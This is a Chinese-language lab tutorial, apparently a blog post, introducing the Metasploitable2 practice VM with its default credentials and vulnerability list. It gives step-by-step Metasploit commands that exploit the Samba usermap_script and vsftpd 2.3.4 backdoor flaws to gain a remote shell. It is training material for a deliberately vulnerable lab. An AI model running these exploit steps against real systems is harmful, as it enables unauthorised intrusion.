为什么年轻时都会颓废堕落一段时间,因为现实否定了我们内心的世界观。。。
---- 网易云热评
一、Metasploitable2简介
Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。
开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。
Metasploit able 2是一个虚拟机文件, 从网上下载解压之后就可以直接使用,不需要自己安装。
下载地址:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
用户名:msfadmin 密码:msfadmin
二、Metasploitable2漏洞列表
1、弱口令漏洞(如vnc、mysql、PostgreSQL等)
2、Samba MS-RPC Shell命令注入漏洞
3、Vsftpd源码包后门漏洞
4、UnreallRCd后门漏洞
5、Linux NFS共享目录配置漏洞
6、Java RMI SERVER命令执行漏洞
7、Tomcat管理台默认口令漏洞
8、root用户弱口令漏洞(SSH爆破)
9、Distcc后门漏洞
10、Samba sysmlink默认配置目录遍历漏洞
11、PHP CGI参数注入执行漏洞
12、DRuby远程代码执行漏洞
13、Ingreslock后门漏洞
14、Rlogin后门漏洞
三、Samba MS-RPC Shell命令注入漏洞
漏洞产生原因:传递通过MS-RPC提供的未过滤的用户 输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
攻击机:kali linux IP:192.168.1.133
靶机:Metasploitable2 IP:192.168.1.131
1、启动数据库并且打开metasploit控制台:msfconsole
![e2faf22df6724310ef4bdcba78f58b0c.png](https://i-blog.csdnimg.cn/blog_migrate/d3879ebc50733a4eb919623861ee86e5.jpeg)
2、搜索可利用的模块:search samba
![8ea2ffbab301454929df09fea5a2ef2f.png](https://i-blog.csdnimg.cn/blog_migrate/4ae512016ba0a76432e702443e7443d4.jpeg)
3、选择要利用的模块:use exploit/multi/samba/usermap_script
查看需要设置的参数:show options
需要设置目标ip和端口(默认139)
![a371200f161de16d96d7aed2ade21590.png](https://i-blog.csdnimg.cn/blog_migrate/a1458ddf391df405cd6a0c47746c3c4f.jpeg)
4、设置目标主机地址:192.168.1.131
![894c2c1de855040fe53c11a6031a78da.png](https://i-blog.csdnimg.cn/blog_migrate/7a6173d6bd4216032192ffb2f90b7c15.jpeg)
5、运行:run 此时已建立shell连接
![7767ecf870b1275fd36de2ef26751efb.png](https://i-blog.csdnimg.cn/blog_migrate/9b4c04dddc95af0f2f8b4439c4333961.jpeg)
6、查看目标主机目录文件:ls
![2445d76229392d2c906729c88654b830.png](https://i-blog.csdnimg.cn/blog_migrate/327e437099d992a93c3b54081c45edc6.jpeg)
四、Vsftpd源码包后门漏洞
漏洞产生原因:在特定版本的vsftpd服务器程序中, 被人恶意植入代码,当用户名以“:)”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。
攻击机:kali linux IP:192.168.1.133
靶机:Metasploitable2 IP:192.168.1.136
1、搜索可用攻击模块:search vsftpd
![3d7a7027befd64c20903b2296e96c47a.png](https://i-blog.csdnimg.cn/blog_migrate/ab87ddddc89e204aa8305a9897efcc6a.jpeg)
2、选择要利用的模块:useexploit/unix/ftp/vsftpd_234_backdoor
查看需要设置的参数:show options
需要设置目标ip和端口(默认21)
![caf61739c6e0cc5e1902e5fff278528a.png](https://i-blog.csdnimg.cn/blog_migrate/16f1f108d5c4de305cfc4c249cb91d6b.jpeg)
3、设置目标主机地址:192.168.1.136
![489895cab8dcd8453a93deca62713360.png](https://i-blog.csdnimg.cn/blog_migrate/7c3720d85f6b6153be99d84d470d3c3e.jpeg)
4、 运行:run 此时已建立shell连接
![9c99c013ca28b2a0ba312e02fe3ff38f.png](https://i-blog.csdnimg.cn/blog_migrate/35512bd74926c20f3863675424f2a897.jpeg)
5、查看目标主机目录文件:ls
![73970940d11fa799f5980dd51df8bb8a.png](https://i-blog.csdnimg.cn/blog_migrate/8476341cfe4e7b6513985fa006129745.jpeg)
禁止非法,后果自负
欢迎关注公众号:web安全工具库